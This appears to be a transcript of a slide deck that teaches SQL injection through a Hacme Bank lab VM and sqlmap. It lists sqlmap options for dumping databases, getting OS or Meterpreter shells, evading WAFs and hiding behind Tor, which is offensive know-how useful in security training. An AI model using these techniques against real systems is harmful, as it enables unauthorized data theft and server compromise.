sql injection manish file
TRANSCRIPT
SQL Injection
BY: Manish Bhandarkar
LAB Setup :-
1) VM with Hack me Bank Installed http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja- sec-com/
2) SQL-Map For Windows https://github.com/sqlmapproject/sqlmap/zipball/master
3) SQL-Map For Unix It is there on Backtrack 5
OWASP TOP 10
A1 : Injection
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data
Injections
Common type of injections : SQL LDAP Xpath etc
IMAPCT : As disastrous as handling the database over to the attacker
Can also lead to OS level access
Definition
Exploiting poorly filtered or in-correctly escaped SQL queries to execute data from user input
Types
Error Based Blind Injections Boolean Injections
How They Are Work?
Application presents a form to the attacker
Attacker sends an attack in the form data
Application forwards attack to the database in a SQL query
Database runs query containing attack and sends encrypted result back to application
Application renders data as to the user
SQL MAP
SQL MAP INTRODUCTION
Powerful command line utility to exploit SQL Injection vulnerability Support for following databases
MySQL IBM DB2 Oracle SQLite PostgreSQL
Firebird Microsoft SQL Server SAP MaxDB Sybase and Microsoft Access
TECHNIQUES OF SQL INJECTION
Boolean-based blind
Time-based blind
Error-based
UNION query
Stacked queries
SQL MAP OPTION KEYS o -u <URL>
o -dbs (To enumerate databases)
o -r (For request in .txt file)
o -technique (SQL injection technique)
o - dbms (Specify DBMS)
o -D <database name> --tables
o -T <table name> --columns
o -C <column name> --dump
o --cookie (Authentication)
o --dump-all
SQL MAP FLOW
Enumerate the database name
Select database and enumerate tables
Select tables and enumerate columns
Select a column and enumerate rows(data)
Choose whatever u want
WHY USED SQL MAP?
Built in capabilities for cracking hashes
Options of running user defined queries
You could run OS level commands
You could have an interactive OS shell
Meterpreter shell with Metasploit
EXTRA USEFUL SQL MAP OPTION KEYS 1
--os-cmd Run any OS level command
--os-shell Starts an interactive shell
--os-pwn Injects a Meterpreter shell
--tamper Evading WAF
EXTRA USEFUL SQL MAP OPTION KEYS 2
--tor: Use Tor anonymity network
--tor-port: Set Tor proxy port other than default
--tor-type: Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)
--check-payload: Offline WAF/IPS/IDS payload detection testing
--check-waf: heck for existence of WAF/IPS/IDS protection
--gpage: Use Google dork results from specified page number
--tamper: custom scripts
U WANT TO EXPLORE MORE
SQL MAP Usage Guide http://sqlmap.sourceforge.net/doc/README.html
SQL MAP WITH TOR http://www.coresec.org/2011/04/24/sqlmap-with-tor/
THANK YOU
BY: Manish Bhandarkar http://www.hackingforsecurity.blogspot.com